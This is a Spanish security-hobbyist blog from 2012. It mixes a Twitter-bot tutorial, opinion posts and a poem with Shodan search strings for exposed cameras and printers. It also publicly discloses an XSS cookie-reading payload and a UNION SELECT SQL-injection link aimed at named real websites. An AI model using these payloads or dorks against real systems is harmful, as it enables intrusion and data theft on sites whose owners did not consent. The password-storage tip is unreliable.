lunes, 13 de febrero de 2012

HowTo: Tu propio Bot en Twitter

Bueno, aparezco de nuevo por aquí, esta vez para mostrarles como hacer un bot propio que pueda postear en twitter, así que... a lo que vamos...

Primeramente, algunos de los bots que hemos desarrollado lo que hacen es recorrer el contenido de una web para postearlo en twitter, para esto utilizamos una combinación poderosa para el parse html... PHP + Simple HTML Dom.



Simple HTML Dom es una libreria desarrollada por S.C. Chen, en php la cual tiene algunos metodos muy completos para parsear una web, desde ya dias venimos trabajando con parseo html y ha sido asi como hemos logrado lanzar nuestros bots @climahonduras, @cinehonduras y una aplicación web que te muestra los productos de diferentes tiendas, como lo hace www.interactivahn.com.

Lo primero que debemos conocer de simple html dom es su función para cargar html:

$html = file_get_html('http://www.google.com/'); 

Esta función carga el contenido de una pagina web de la cual pasamos como parametro.

Nuestro siguiente paso conciste en hacer el filtrado de la información que deseamos extraer de dicho contenido, lo cual lo podemos realizar de la siguientes formas: 

$ret = $html->find('a'); //Extrae todas las etiquetas a del html

De esta linea podemos extraer atributos de la siguiente forma:
echo $ret->href;
 Podemos imprimir cualquier texto dentro de las etiquetas <a></a>:
echo $ret->plaintext;

Podemos hacer filtros especificos por ejemplo todos los div con determinado ID.

ret = $html->find('div[id=foo]'); //Extrae todas las etiquetas div con id = "foo"

Luego es cuestion de manipular nuestra información.


Hasta ahora tenemos ya la información, pero como la posteamos en twitter???

Con una librearia php de nombre twitteroauth, desarrollada por Abraham Williams @abraham, la cual podemos obtener desde su github: 
De aqui necesitamos descargar twitteroauth.php y OAuth.php

Antes de esto necesitamos registrar una aplicación en twitter, para poder obtener nuestros Access_key, Access_token, Consumer_secret,etc...
Al crear la app debes darle permiso de Lectura y Escritura para poder postar, una vez realizado esto procedemos a configurar la libreria con el siguiente codigo:
<?
require('twitteroauth.php');
define('_CONSUMER_KEY','Colocas tu key aquí');
define('_CONSUMER_SECRET','Tu secret aquí');
define('_OAUTH_TOKEN','Tu token');
define('_OAUTH_TOKEN_SECRET','tu secret token');
$connection = new TwitterOAuth(_CONSUMER_KEY, _CONSUMER_SECRET,_OAUTH_TOKEN, _OAUTH_TOKEN_SECRET);
 $twitter=$connection->post('statuses/update', array('status' => "TU CONTENIDO A POSTEAR"));
?>

Luego creas un nuevo cronjob para que ejecute este script cuando tu quieres y listo...

saludos....



martes, 7 de febrero de 2012

Dorks interesantes para SHODAN

Estuve algún tiempo fuera de las lineas del blog, pero hoy regreso para compartir un conjunto de dorks muy interesantes para hacer búsquedas especificas en shodan :

Impresoras
Server: Virata-EmWeb/R6_2_1 //Impresoras
Location: /hp/device/this.LCDispatcher 

Cámaras de vigilancia
Server: Camera Web Server/1.0 
Server: AV-TECH AV787 Video Web Server
Server: IP_SHARER WEB 1.0 
Server: Nucleus/4.3 UPnP/1.0 Virata-EmWeb/R6_2_
También pueden utilizar la palabra Camera para búsqueda mas genérica de cámaras.


Canales de tv por IP
Server: aEGiS_nanoweb/2.2.5 


Dell Remote Access Controller 4/P 
Server: RAC_ONE_HTTP 1.0 

Video conferencias
Server: NetPort Software 1.1

Sun Java system y Oracle
Server: Sun-Java-System-Web-Server/7.0 
Server: Sun Java System Application Server 9.1_02 
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server

Para buscar por países usan el dork country:ES para España por ejemplo.


Saludos, 

martes, 24 de enero de 2012

¿Y ahora les interesa la Seguridad informática?


Viendo hoy en día los últimos acontecimientos en lo que muchos llamamos una revolución cibernetica en donde el acceso a la información se a convertido en la manzana de la discordia, en un mundo en el que latinoamerica se encuentra (Hubiera querido utilizar encontraba) desprotegida ante la falta de seguridad en muchos paises y empresas que no le dan la importancia debida a este tema.

Pero hoy todos deberíamos de pensar un poco mas lo que publicamos y en donde lo hacemos, los desarrolladores hoy por hoy escuchamos mas seguido la palabra "hackers" eso sin duda alguna nos debería de hacer detenernos un poco mas en las lineas que programamos, porque no solo se hace una herramienta que solucionara un problema o necesidad sino que, si la herramienta contiene bugs o errores que comprometan los datos se podrían convertir en armas que compartan información o que permitan utilizar nuestros recursos para actos delictivos.
Como se hace actualmente, ingresar (lease hackear) a una web subir archvios para hacer Phishing o para realizar ataques a otros sitios, esto no solo compromete al delincuente que realiza el delito, sino que podría causar un momento bochornoso a una empresa que tenga que aclarar los sucedido y dar explicaciones publicas y lógicamente el riesgo de perder la confianza de sus clientes.

En tantos aspectos influye ahora la seguridad informática, y es que el detalle es, que si tienes buena seguridad nadie se da cuenta pero si no la tienes puede que todo el mundo lo sepa y solamente tu no, hasta que alguien decida reportarlo o explotarlo.

Y termino con el titulo del post.

¿Y ahora les interesa la Seguridad informática?

Hasta la PROXYma.

Zone-h , la mayor base de datos de hacks a sido hackeada

Zona-h.com , un sitio muy conocido por tener espejos de sitios hackeados, fue hackeada esta hace algunas horas.


Para los que no saben exactamente sobre que es esta web;

Esta web es utilizada por hackers para publicar los sitios o servidores que "hackeado".


En el mensaje se lee:

Note : It’s Unacceptable when we tried to notify defaced.zone-h.net and found tNote : It’s Unacceptable when we tried to notify defaced.zone-h.net and found this message ” nice try” it’s not a try it’s a real! your server rooted, all the websites hacked, all people knew that ! and it’s the third time to hack your websites 2 of them in 2010( 2010/04/02 > Brazilian domains + 06/2010 zone-h.com defacement database ),and now ! you should have the courage and allow the defacers to notify your sites, it’s the real courage !

La otra parte de la imagen:



sábado, 21 de enero de 2012

[Ferock] Me Presento...

Saludos amigos que nos visitan desde los reconditos mas lejanos de la red, me presento atentamente a ustedes como @ferock un simple programador y amante de la seguridad informatica que les estara compartiendo contenido desde el dia de hoy.

Para comenzar les comentare una anecdota de como obtuve acceso a un sistema, y que debemos tomar en cuenta para preveer estos incidentes.

En la universidad en la que estudio, presentaron un sistema de Clases Online, lo realizaron en el auditorio principal de la Universidad y mientras un instructor nos explicaba como acceder al portal de clases online, a lo que ponia atencion, mientras el ingresaba con un Usuario de demostracion a lo que pude observar, el password y la contraseña tenian el mismo numero de caracteres, a lo cual pude deducir que eran la misma palabra, no quise quedarme con la duda y al tener una computadora lo pude comprobar:
Usuario: alumno
Password: alumno

Sacando una moraleja de este tan insignificante pero importante descuido, muchas veces descuidamos la seguridad de nuestros datos, creemos que para no complicarnos la vida y no olvidar nuestra contraseña ponemos una facil y listo, pero es en ese momento que debemos reflexionar: ¿Que es lo que estamos protegiendo?, ¿Qué información pongo en riesgo si se obtiene esa contraseña? ¿Qué exponemos? y mas concretamente ¿Qué pasa si adivinan mi contraseña?.


Aqui les dejo unos consejos para tomar en cuenta al momento de crear o cambiar una contraseña que les serviran para proteger su información de cualquiera:

1. Nunca uses palabras faciles (Dios, amor, password, tu nombre, etc).

2. Nunca uses solo numeros Ejemplo: (123456, 1988, 1990, 2001, 07072012, ni fechas) pues pueden ser obtenidas con facilidad mediante fuerza bruta.

3. Utiliza caracteres especiales, por ejemplo: # $ % & / ( ! @.

4. No utilizar la misma contraseña para todos tus accesos. Te recomendaria usaras una contraseña generica para tu accesos que no son tan importantes y evitar tener una contraseña para cada sitio que te registres. También puede usar un patron y agregar algo relacionado con tu acceso, por ejempli: patron+fb, patron+tw, patron+wifi, patron+pc, etc.

5. Guarda tus contraseñas en un archivo de texto y guardalo en un lugar seguro.


Estos son algunos de los consejos para generar una contraseña segura, o al menos que no sea tan facil de adivinar (Hay que dificultar un poco al menos las cosas a los atacantes).

viernes, 20 de enero de 2012

Anonymous, Ciber War y Megaupload.


Los últimos hechos ocurridos ha desenvuelto una avalancha de información, unos hablan de ciberterrorismo, otros de ciber guerra y hasta del "fin del mundo virtual".

Pero yo traigo algunas preguntas, por ejemplo:

-¿Casualidad que un día después de las protestas pacificas por SOPA hayan cerrado Megaupload?

-¿El FBI cierra megaupload sabiendo que algunos llamados por los medios de comunicación "grupos de hackers" saldrán en defensa y tomarían acciones por lo que hizo el FBI?

-¿En todo el mundo ayer hubo problemas con algunos enlaces de Internet, otra casualidad o saturación de tráfico?

Todo me parece una jugada bien planeada por el FBI y el gobierno de USA, sabían que Anonymous respondería ante esa acción, el FBI se prepara para capturar información durante los ataques de las ips de donde venían, sabiendo que Anonymous se a vuelto una moda y que muchas de las personas que participan en estos ataques no toman las medidas de precaución necesarias del caso, como por ejemplo la popular herramienta web (LOIC) que usan y que cualquiera que quiera parecer "jacker" entra y la utiliza para aparentar se un genio de la computación frente a sus amigos, como en diversos blogs, foros y redes sociales publican mensajes "Ingresa a esta web y déjala abierta para apoyar #OPMegaupload".





En mi opinión el FBI va a capturar unos cuantos "Anonymous" y ya la moda de este grupo entre la gente que quiere aparentar ser algo que aun no es se acabara, y de seguir Anonymous sera realmente con 1337
Pero Anonymous necesitara que la gente los apoye o podrán desarrollar este tipo de ataques sin ayuda masiva?...

Le doy cierta razón a los Mayas, para los cuales el calendario llegaba hasta Diciembre de 2012, pero será este el comienzo del fin de Internet un mundo abierto que nos lleno de conocimientos (buenos y malos), y que ahora con SOPA y esta Ciber guerra que desde hace días está sucediendo..está en peligro de extinción, porque el internet sin libertad (Libertad distinto de libertinaje) de poco o nada nos serviría.

Pero siendo optimista y viendo el vaso medio lleno, puede ser el comienzo de una revolución creativa en donde todos veamos maneras de crear o de reinventar medios de comunicación y otros tipos de redes o aparatos que con los adelantos tecnológicos y conocimientos que tenemos actualmente un atraso nos podría llevar a un mayor adelanto.

"En tiempos de crisis la imaginación es más efectiva que el intelecto." Albert Einstein.

En mi humilde opinión.


Hasta la PROXYma.

miércoles, 18 de enero de 2012

Pésima Atención al cliente en Chat de towebs.com

Hoy buscaba un servicio de web-hosting y en especial estaba interesado en un VPS , publique en mi TL que me recomendaran algun webhosting y esta persona @MarianoLoPrety me escribió sobre http://www.towebs.com entre a la web y decidí pedir mas información sobre el servicio de Housing que anuncian en su sitio.

Lo que me sucedió en lugar de enojarme me dio risa, el pobre Eduardo estaba frustrado.


Y mejor les coloco la "charla"que tuve con el operador llamado Eduardo:

[ 13:17:59 ] Consulta : Consulta
[ 13:18:08 ] Sistema : Usted fue atendido en 10 segundos por Eduardo
[ 13:18:08 ] Eduardo : Bienvenido a ToWebs, ¿en qué lo puedo ayudar?
[ 13:18:29 ] Eduardo : Que tal buenas tardes en que puedo ayudarlo?
[ 13:18:36 ] Cliente : buen dia, quisiera saber un poco mas sobre el servicio VPS que tienen
[ 13:18:46 ] Eduardo : No ofrecemos VPS, esta mal en el sitio
[ 13:18:50 ] Eduardo : solo webhosting tradicional
[ 13:18:51 ] Eduardo : compàrtido
[ 13:18:54 ] Eduardo : Tenemos planes desde 18,90 pesos mas iva mensuales
[ 13:19:01 ] Cliente : y el de Housing ?
[ 13:19:12 ] Eduardo : Tampoco ofrecemos Housing
[ 13:19:42 ] Cliente : LINK
[ 13:19:49 ] Cliente : y eso ?
[ 13:20:15 ] Eduardo : Hagamos algo, le paso el mail donde puede pedir explicaciones sobre por qué no vendemos algo que está en el sitio
[ 13:20:20 ] Eduardo : yo ya me canse de darlas disculpe
[ 13:20:23 ] Eduardo : consultas@towebs.com
[ 13:20:31 ] Eduardo : no damos esos servicios, y no quieren sacarlo del sitio
[ 13:20:40 ] Eduardo : puede enviar una queja o lo que tenga ganas a esa casilla
[ 13:20:42 ] Eduardo : Tiene alguna otra consulta en que lo pueda ayudar?
[ 13:23:51 ] Cliente : gracias por nada
[ 13:23:57 ] Eduardo : El chat ha finalizado

Y la imagen que hace constar:




lunes, 16 de enero de 2012

sábado, 14 de enero de 2012

Poesía Hacker

Si el titulo lo dice todo, leyendo y buscando informacion en internet me tope con el blog de David Emerling Rondon ganador del II Festival de Poesía Hacker que se realizo en el Sexto Congreso Nacional de Software Libre (6ºCnSL).
Es de hace mas o menos un año pero realmente es sus letras se plasma el sentimiento de muchos de nosotros amantes de los bytes y que nos pasamos horas entre paquetes de información.

si mas les dejo el poema titulado:

Somos muchos, seremos mas...



 From Wiki CNSL Caracas 2010
"Somos muchos... Seremos más"
es acaso un insulto
querer intentar mejor uso
de la memoria de mis pensamientos
de los recursos que consumo
si existe libre universo
donde me siento mas seguro
donde no tengo el temor
de ser pirata alguno
Donde la paz y tranquilidad
me llevan rápido a navegar
por cada rincón de mi libertad
sin temor a fallar.
sin querer hacer daño alguno
y si acaso se me complica la situación
no dudo, busco a la comunidad
preguntas y respuestas;
mil cosas de que hablar,
probar, ensayar y aprender
¡¿díganme que no es divina la libertad?!
si cuando pienso que las cosas no se van a dar
algún grupo, alguna persona de la comunidad
me aclara, me ayuda y aveces sin cobrar.
que puedo repetirlo
cual chismoso en vecindad
que puedo cambiarlo y hasta alterar
¡con estas ganas que tengo yo de cooperar!
el ser parte de algo
que por siempre perdurará
ayudará a muchos a mejorar
a descubrir sus libertad
hoy siendo muchos
mañana serán más
porque soy los que soy
por lo que son los demás.
Por David Emerling Rondón
Licencia, copyleft 2010 - Reconocimiento-Sin obras derivadas 3.0
Retrieved from "http://cnsl.netlynx.com.ve/index.php?title=Somos_muchos..._Seremos_m%C3%A1s"

martes, 10 de enero de 2012

[XSS] AMCHAM – Honduras , iSQL en ASP

El error de XSS se encuentra en el buscador en español de dicha web

http://www.amchamhonduras.org/buscar_es.asp

Al realizar la siguiente busqueda por ejemplo podriamos robar cookies de sesion :

<script>
 alert ('Mi Cookie!:'+document.cookie)
</script>


Y por su fuera poco esto tambien genera un error en la base de datos:

Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.


Hasta la PROXYma 

viernes, 6 de enero de 2012

[iSQL] en COMCEL Music

El Link Mágico es el siguiente:

http://www.wazzupmusic.com/sitio/albums.php?accion=artista&idartista=1%20UNION%20SELECT%201,2,3,4--

Esto lo tenia entre mis archivos, por alguna razón que no recuerdo no lo había posteado jejeje.

Pero ahi esta el link.
Es interesante porque la empresa desarrolladora de este sistema globalnetmobile.com, tenia el mismo bug pero ya lo repararon en las siguientes paginas:


http://www.musica.tigo.com.py/sitio/albums.php?accion=artista&idartista=949%27
http://www.tigomusic.com.co/sitio/albums.php?accion=artista&idartista=949%27
http://www.tigomusic.com.gt/sitio/albums.php?accion=artista&idartista=1093%27
http://www.tigomusic.com.sv/sitio/albums.php?accion=artista&idartista=1093%27
http://www.alomusic.cr/sitio/albums.php?accion=artista&idartista=1491
http://www.orangemusicstore.com.do/albums.php?accion=artista&idartista=883%27

Imagino que se les paso por alto el que les he mostrado.


Hasta la PROXYma.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host